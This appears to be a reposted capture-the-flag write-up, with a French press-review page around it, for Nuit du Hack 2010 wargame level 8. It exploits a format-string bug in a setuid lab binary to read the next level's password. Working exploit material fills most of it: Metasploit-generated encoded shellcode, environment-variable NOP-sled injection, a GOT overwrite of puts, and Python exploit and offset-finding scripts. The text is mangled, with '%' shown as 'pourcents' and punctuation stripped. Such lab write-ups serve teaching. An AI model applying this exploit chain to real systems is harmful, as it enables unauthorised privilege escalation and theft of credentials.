Menu > Articles de la revue de presse : - l'ensemble [tous | francophone] - par mots clé [tous] - par site [tous] - le tagwall [voir] - Top bi-hebdo de la revue de presse [Voir]

---

S'abonner au fil RSS global de la revue de presse

---

Présentation : this article is a resolution of the french Nuit du hack 2010 wargame level 8 test. The vulnerability is a format string. Its resolution is a direct application of the method aborded in the article tutorial exploitation format strings available on infond. french version available. the vulnerability Here is the source code level8 srv-public cat level8.c include include gcc -o level8 level8.c -fno-stack-protector -z execstack -mpreferred-stack-boundary 2 int main int argc, char argv if argc push pourcentsebp 0x08048425 mov pourcentsesp,pourcentsebp 0x08048427 sub 0x4,pourcentsesp 0x0804842a cmpl 0x1,0x8 pourcentsebp 0x0804842e jg 0x8048448 0x08048430 movl 0x8048530, pourcentsesp 0x08048437 call 0x8048350 0x0804843c movl 0xffffffff, pourcentsesp 0x08048443 call 0x8048360 0x08048448 mov 0xc pourcentsebp ,pourcentseax 0x0804844b add 0x4,pourcentseax 0x0804844e mov pourcentseax ,pourcentseax 0x08048450 mov pourcentseax, pourcentsesp 0x08048453 call 0x8048340 0x08048458 movl 0x804853e, pourcentsesp 0x0804845f call 0x8048350 0x08048464 movl 0x0, pourcentsesp 0x0804846b call 0x8048360 End of assembler dump. gdb break main 52 Breakpoint 1 at 0x8048458 gdb r perl -e 'print pourcentsx- x100' Starting program home level8 level8 perl -e 'print pourcentsx- x100' Breakpoint 1, 0x08048458 in main gdb x 128x esp 0xbffff6d4 0xbffff876 0xbffff738 0xb7ea4c85 0x00000002 0xbffff6e4 0xbffff764 0xbffff770 0xb7fe0b48 0x00000001 0xbffff6f4 0x00000001 0x00000000 0x08048266 0xb7fd5ff4 0xbffff704 0x08048480 0x08048370 0xbffff738 0x9479c0de 0xbffff714 0xbf0c94ce 0x00000000 0x00000000 0x00000000 0xbffff724 0xb7ff6270 0xb7ea4bad 0xb7ffeff4 0x00000002 0xbffff734 0x08048370 0x00000000 0x08048391 0x08048424 payload As for the previous tests, we use Metasploit to generate the payload. msfconsole msf use payload linux x86 exec msf payload exec set ENCODER x86 alpha_mixed ENCODER x86 alpha_mixed msf payload exec set CMD cat .. level9 passwd CMD cat .. level9 passwd msf payload exec generate linux x86 exec - 174 bytes http www.metasploit.com Encoder x86 alpha_mixed PrependSetresuid false, PrependSetreuid false, PrependSetuid false, PrependChrootBreak false, AppendExit false, CMD cat .. level9 passwd buf x89 xe6 xdd xc0 xd9 x76 xf4 x5d x55 x59 x49 x49 x49 x49 x49 x49 x49 x49 x49 x49 x43 x43 x43 x43 x43 x43 x37 x51 x5a x6a x41 x58 x50 x30 x41 x30 x41 x6b x41 x41 x51 x32 x41 x42 x32 x42 x42 x30 x42 x42 x41 x42 x58 x50 x38 x41 x42 x75 x4a x49 x43 x5a x46 x6b x51 x48 x4e x79 x42 x72 x50 x66 x43 x58 x44 x6d x50 x63 x4c x49 x4d x37 x43 x58 x44 x6f x50 x73 x51 x78 x43 x30 x51 x78 x46 x4f x42 x42 x42 x49 x50 x6e x4b x39 x4b x53 x50 x52 x48 x68 x45 x45 x47 x70 x45 x50 x47 x70 x45 x33 x45 x31 x44 x34 x45 x70 x46 x4e x46 x4e x46 x4f x50 x6c x45 x35 x50 x76 x50 x65 x50 x6c x44 x79 x44 x6f x42 x50 x50 x61 x50 x73 x42 x53 x50 x77 x50 x64 x45 x50 x43 x67 x46 x33 x4c x49 x4b x51 x48 x4d x4f x70 x41 x41 Here is the payload x89 xe6 xdd xc0 xd9 x76 xf4 x5d x55 x59 x49 x49 x49 x49 x49 x49 x49 x49 x49 x49 x43 x43 x43 x43 x43 x43 x37 x51 x5a x6a x41 x58 x50 x30 x41 x30 x41 x6b x41 x41 x51 x32 x41 x42 x32 x42 x42 x30 x42 x42 x41 x42 x58 x50 x38 x41 x42 x75 x4a x49 x43 x5a x46 x6b x51 x48 x4e x79 x42 x72 x50 x66 x43 x58 x44 x6d x50 x63 x4c x49 x4d x37 x43 x58 x44 x6f x50 x73 x51 x78 x43 x30 x51 x78 x46 x4f x42 x42 x42 x49 x50 x6e x4b x39 x4b x53 x50 x52 x48 x68 x45 x45 x47 x70 x45 x50 x47 x70 x45 x33 x45 x31 x44 x34 x45 x70 x46 x4e x46 x4e x46 x4f x50 x6c x45 x35 x50 x76 x50 x65 x50 x6c x44 x79 x44 x6f x42 x50 x50 x61 x50 x73 x42 x53 x50 x77 x50 x64 x45 x50 x43 x67 x46 x33 x4c x49 x4b x51 x48 x4d x4f x70 x41 x41 injection We need the program getenvaddress already used in level5, do not forget to delete spaces added to include because of a bug in blogspot.com level6 srv-public vim tmp getenvaddress.c getenvaddress.c thanks Niklos usage inject 'NOMDELAVARIABLEDENVIRONNEMENT' include include include int main int argc, char argv char ptr ptr getenv argv 1 if ptr NULL printf pourcentss not found n , argv 1 else printf pourcentss found at pourcents08x n , argv 1 , unsigned int ptr return 0 compile remember, delete spaces in include level6 srv-public gcc -Wall -o tmp getenvaddress tmp getenvaddress.c add NOPs and inject in the environment variable export LOL perl -e 'print x90 x200 . x89 xe6 xdd xc0 xd9 x76 xf4 x5d x55 x59 x49 x49 x49 x49 x49 x49 x49 x49 x49 x49 x43 x43 x43 x43 x43 x43 x37 x51 x5a x6a x41 x58 x50 x30 x41 x30 x41 x6b x41 x41 x51 x32 x41 x42 x32 x42 x42 x30 x42 x42 x41 x42 x58 x50 x38 x41 x42 x75 x4a x49 x43 x5a x46 x6b x51 x48 x4e x79 x42 x72 x50 x66 x43 x58 x44 x6d x50 x63 x4c x49 x4d x37 x43 x58 x44 x6f x50 x73 x51 x78 x43 x30 x51 x78 x46 x4f x42 x42 x42 x49 x50 x6e x4b x39 x4b x53 x50 x52 x48 x68 x45 x45 x47 x70 x45 x50 x47 x70 x45 x33 x45 x31 x44 x34 x45 x70 x46 x4e x46 x4e x46 x4f x50 x6c x45 x35 x50 x76 x50 x65 x50 x6c x44 x79 x44 x6f x42 x50 x50 x61 x50 x73 x42 x53 x50 x77 x50 x64 x45 x50 x43 x67 x46 x33 x4c x49 x4b x51 x48 x4d x4f x70 x41 x41 ' find the address of the payload level6 srv-public tmp getenvaddress LOL LOL found at bffffe5d We will use bffffe7d 32 bytes more, to jump into NOPs . control the execution flow We do not have any RET after function printf call. So we can not control the execution flow from the stack no EIP saved on the stack . So we will use another writable address used by the program. replace a GOT entry ------------------- function puts is called after function printf in main gdb disassemble main ... 0x08048450 mov pourcentseax, pourcentsesp 0x08048453 call 0x8048340 0x08048458 movl 0x804853e, pourcentsesp 0x0804845f call 0x8048350 0x08048464 movl 0x0, pourcentsesp 0x0804846b call 0x8048360 We will crush the function puts entry in the Global Offset Table GOT . Then, when puts will be called, our payload will be executed. To obtain the addresses in the GOT, here are 2 methods method 1 with objdump level8 srv-public objdump -s -j .got.plt . level8 . level8 file format elf32-i386 Contents of section .got.plt 804963c 68950408 00000000 00000000 26830408 h........... ... 804964c 36830408 46830408 56830408 66830408 6...F...V...f... level8 srv-public objdump -R . level8 . level8 file format elf32-i386 DYNAMIC RELOCATION RECORDS OFFSET TYPE VALUE 08049638 R_386_GLOB_DAT __gmon_start__ 08049648 R_386_JUMP_SLOT __gmon_start__ 0804964c R_386_JUMP_SLOT __libc_start_main 08049650 R_386_JUMP_SLOT printf 08049654 R_386_JUMP_SLOT puts 08049658 R_386_JUMP_SLOT exit method 2 with gdb Let's see the puts assembler code gdb disassemble puts Dump of assembler code for function puts plt 0x08048350 jmp 0x8049654 0x08048356 push 0x18 0x0804835b jmp 0x8048310 End of assembler dump. The instruction jmp 0x8049654 is interesting because it is an entry in the GOT gdb x x 0x08049654 0x8049654 0x08048356 So we can write our payload address 0xaabbccdd at address 0x08049654 find how many words there are over our string on the stack ---------------------------------------------------------- Here is a little script to find how many words there are on the stack over our string. This script proposes too to add padding to align the address on a stack word. level8 srv-public cat tmp find.py bin python import subprocess padding '' while True p subprocess.Popen ' bin sh',stdin subprocess.PIPE,stdout subprocess.PIPE cmd home level8 level8 AAAA padding -pourcentsx 110 grep 4141 stack p.communicate cmd 0 index stack.find '-41414141' if index -1 break padding 'B' print stack print number of words up to our string dec print stack.count '-',0,index print padding added ' padding ' level8 srv-public python tmp find.py AAAAB-bffff728-b7ea4c85-2-bffff754-bffff760-b7fe0b48-1-1-0-8048266-b7fd5ff4-8048480-8048370-bffff728-724fa0f2-593a94e2-0-0-0-b7ff6270-b7ea4bad-b7ffeff4-2-8048370-0-8048391-8048424-2-bffff754-8048480-8048470-b7ff0fd0-bffff74c-b7ffc793-2-bffff848-bffff85c-0-bffff9ac-bffff9bc-bffff9c7-bffff9ea-bffff9fd-bffffa09-bffffef9-bfffff26-bfffff3c-bfffff52-bfffff63-bfffff73-bfffff8a-bfffff9c-bfffffa4-bfffffb3-0-20-b7fe1414-21-b7fe1000-10-febfbff-6-1000-11-64-3-8048034-4-20-5-7-7-b7fe2000-8-0-9-8048370-b-3f0-c-3f1-d-3f0-e-3f0-17-1-f-bffff83b-0-0-0-69000000-363836-0-0-6d6f682f-656c2f65-386c6576-76656c2f-386c65-41414141-78252d42-2d78252d-252d7825-78252d78-2d78252d-252d7825-78252d78-2d78252d number of words up to our string dec 101 padding added 'B' calculate ni -------------- We want address 3 address 2 address 1 address pourcents1 n1 - 16 xpourcents m 1 npourcents1 n2-n1 xpourcents m 2 npourcents1 n3-n2 xpourcents m 3 npourcents1 n4-n3 xpourcents m 4 n padding address x54 x96 x04 x08 source 0xbffffe7d n1-16 0x7d - 0x10 125 - 16 109 n2-n1 0x1fe - 0x7d 510 - 125 385 n3-n2 0x2ff - 0x1fe 767 - 510 257 n4-n3 0x3bf - 0x2ff 959 - 767 192 exploitation We still have two more difficulties to pass, because of variations in the stack organisation each time we run the program level8 - first one is about how many words there are over our string. Indeed, there number changes every day, - second one is about the position of the first byte or our string. It changes sometimes. Then the addresses we push on the stack are not aligned anymore. In our exploitation, the two parameters which deal with theses issues are m and padding . with our script tmp find.py we found that - m is around 101, - padding is around A . So here is our string level8 srv-public cat tmp solution.py bin python address3 x57 x96 x04 x08 address2 x56 x96 x04 x08 address1 x55 x96 x04 x08 address x54 x96 x04 x08 n1_16 0109 n2_n1 0385 n3_n2 0257 n4_n3 0192 m 101 m1 00102 m2 00103 m3 00104 m4 00105 padding A print address address1 address2 address3 pourcents1 n1_16 x pourcents m1 n pourcents1 n2_n1 x pourcents m2 n pourcents1 n3_n2 x pourcents m3 n pourcents1 n4_n3 x pourcents m4 n padding But it does not work level8 srv-public . level8 python tmp solution.py Erreur de segmentation 1st method , manually ---------------------- As we have less than 15 attempts to do, let's do it manually m 101, padding A , m 101, padding AA , m 101, padding AAA , m 101, padding , m 100, padding A , m 100, padding AA , m 100, padding AAA , m 100, padding , m 102, padding A , m 102, padding AA , m 102, padding AAA , m 102, padding , m 099, padding A , m 099, padding AA Bingo 2nd method , counting ---------------------- It is possible to see what the stack looks like aproximatly with gdb. This helps us to set m and padding . The system error log provides the wrong value read on the stack for our destination address address level8 srv-public dmesg grep level8 sed -n ' p' 102243.163546 level8 3236 segfault at 386c65 ip b7ecfa30 sp bfffe148 error 6 in libc-2.11.1.so b7e8e000 146000 The exploitation stack is approximatly like level8 srv-public gdb . level8 gdb break printf Breakpoint 1 at 0x8048340 gdb run python tmp solution.py Starting program home level8 level8 python tmp solution.py Breakpoint 1, 0xb7ed6060 in printf from lib i686 cmov libc.so.6 gdb x 144x esp ... 0xbffff790 0x0000000f 0xbffff7ab 0x00000000 0x00000000 0xbffff7a0 0x00000000 0x00000000 0x69000000 0x00363836 0xbffff7b0 0x00000000 0x00000000 0x00000000 0x6f682f00 0xbffff7c0 0x6c2f656d 0x6c657665 0x656c2f38 0x386c6576 0xbffff7d0 0x04965400 0x04965508 0x04965608 0x04965708 0xbffff7e0 0x24312508 0x39303130 0x30302578 0x24303031 0xbffff7f0 0x2431256e 0x35383330 0x30302578 0x24313031 0xbffff800 0x2431256e 0x37353230 0x30302578 0x24323031 0xbffff810 0x2431256e 0x32393130 0x30302578 0x24333031 0xbffff820 0x0041416e 0x4c454853 0x622f3d4c 0x622f6e69 0xbffff830 0x00687361 0x4d524554 0x6574783d 0x53006d72 0xbffff840 0x435f4853 0x4e45494c 0x33383d54 0x3530322e 0xbffff850 0x3131312e 0x3031312e 0x38383420 0x32203430 0x00386c65 is one word before our target address 0x08049654. So m OK m tested -1 100 We see that there is one character too much, so padding OK padding tested - A A solution at the date of writing ---------------------------------- So here is the solution which works today level8 srv-public cat tmp solution.py bin python address3 x57 x96 x04 x08 address2 x56 x96 x04 x08 address1 x55 x96 x04 x08 address x54 x96 x04 x08 n1_16 0109 n2_n1 0385 n3_n2 0257 n4_n3 0192 m1 00100 m2 00101 m3 00102 m4 00103 print address address1 address2 address3 pourcents1 n1_16 x pourcents m1 n pourcents1 n2_n1 x pourcents m2 n pourcents1 n3_n2 x pourcents m3 n pourcents1 n4_n3 x pourcents m4 n AA level8 srv-public . level8 python tmp solution.py MOT DE PASSE references tutorial format string - http infond.blogspot.com tutoriel format string - http www.bases-hacking.org format-strings.html printf - http www.cplusplus.com reference clibrary cstdio printf

Les mots clés de la revue de presse pour cet article : tutorial
Les videos sur SecuObs pour les mots clés : tutorial
Les éléments de la revue Twitter pour les mots clé : tutorial





Les derniers articles du site "infond" :

- openvpn et iphone
- tutoriel openvpn
- sécuriser un wiki
- list of blogs
- création de la communauté infond
- howto find a specific string in an unmounted hard disk
- Howto add a header banner to MediaWiki
- utiliser son iphone comme modem USB 3G sous ubuntu
- progresser en sécurité informatique
- quelques outils pour RSA

---

S'abonner au fil RSS global de la revue de presse

---